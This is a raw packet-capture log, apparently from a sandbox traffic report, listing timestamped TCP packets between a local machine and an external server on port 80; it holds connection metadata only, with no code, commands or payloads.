Dec 13, 2024 01:37:14.534156084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.534204960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.534962893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.535079956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.535129070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.535876036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.535967112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.536277056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.536796093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.536885023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.536931992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.537693024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.537817955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.537878036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.538609982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.538711071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.538762093 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.539505005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.539624929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.539980888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.540453911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.540563107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.540612936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.541361094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.541472912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.542239904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.542294979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.542370081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.542431116 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.543147087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.543262959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.543329000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.544080019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.544223070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.544274092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.544964075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.545150042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.545197964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.545881987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.545998096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.546462059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.546787977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.546912909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.546964884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.547698975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.547849894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.547900915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.548609972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.548738003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.548789024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.549514055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.549634933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.549685955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.550426006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.550537109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.550604105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.551342010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.551454067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.551497936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.552242041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.552349091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.552411079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.553154945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.553240061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.553298950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.554104090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.554229975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.554280043 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.554974079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.555067062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.555125952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.555901051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.555937052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.555991888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.556788921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.556906939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.556958914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.557710886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.557823896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.557899952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.558607101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.558728933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.558799982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.559533119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.559648991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.559705973 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.560425043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.560538054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.560587883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.561328888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.561387062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.561463118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.562252045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.562342882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.562395096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.563142061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.563302994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.563441992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.564060926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.564122915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.564184904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.564980030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.565090895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.565166950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.565879107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.566005945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.566082001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.566791058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.566893101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.566945076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.567714930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.567764997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.567810059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.568639040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.568758011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.568809986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.569520950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.569636106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.569689035 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.570708990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.570743084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.570790052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.571326017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.614048958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.715745926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.715828896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.715883970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.716049910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.716196060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.716243982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.716973066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.717051029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.717097998 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.717859030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.717997074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.718055010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.718760014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.718873978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.718923092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.719669104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.719774008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.719877958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.720596075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.720705032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.720757008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.721525908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.721579075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.721627951 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.722409010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.722552061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.722606897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.723330975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.723443985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.723615885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.724225044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.724340916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.724394083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.725126982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.725245953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.725301027 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.726059914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.726172924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.726227045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.726953983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.727063894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.727150917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.727860928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.727963924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.728144884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.728786945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.728883982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.728936911 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.729675055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.729794025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.729854107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.730618954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.730715990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.730766058 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.731515884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.731621027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.731678009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.732423067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.732523918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.732604027 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.733397007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.733505964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.733556986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.734258890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.734311104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.734359026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.735138893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.735253096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.735305071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.736062050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.736154079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.736332893 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.736960888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.737066984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.737117052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.737878084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.737972021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.738061905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.738789082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.738956928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.739037991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.739669085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.739794016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.739861965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.740583897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.740715981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.740777016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.741513014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.741628885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.741686106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.742399931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.742526054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.742578983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.743329048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.743587017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.743655920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.744224072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.744343042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.744718075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.745160103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.745280027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.745330095 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.746047020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.746172905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.746632099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.746968985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.747077942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.747137070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.747941971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.747977018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.748328924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.748794079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.748893976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.748943090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.749696970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.749881983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.749931097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.750602961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.750720024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.750768900 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.751516104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.751620054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.751667023 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.752434015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.752624989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.752700090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.753333092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.753443003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.753501892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.754242897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.754355907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.754417896 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.755151033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.755264044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.755335093 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.756057024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.756228924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.756478071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.756968975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.757072926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.757188082 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.757869959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.757980108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.758033037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.758789062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.758889914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.758936882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.759701014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.759816885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.759862900 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.760601044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.760715961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.760765076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.761548996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.761647940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.761694908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.762440920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.762536049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.762584925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.763293028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.817174911 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.907656908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.907696962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.907763004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.907901049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.907977104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.908029079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.908807039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.908876896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.908925056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.909722090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.909836054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.909889936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.910612106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.910742044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.910790920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.911541939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.911642075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.911691904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.912411928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.912570000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.912744999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.913368940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.913405895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.913482904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.914251089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.914454937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.914571047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.915163994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.915276051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.915330887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.916093111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.916198015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.916290998 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.917001009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.917079926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.917140007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.917911053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.918040991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.918113947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.918786049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.918916941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.918967962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.919723034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.919836998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.919888020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.920620918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.920737028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.920787096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.921535969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.921633005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.921680927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.922451019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.922508001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:14.922713041 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:14.923365116 CET	80	49707	185.81.68.147	192.168.2.5
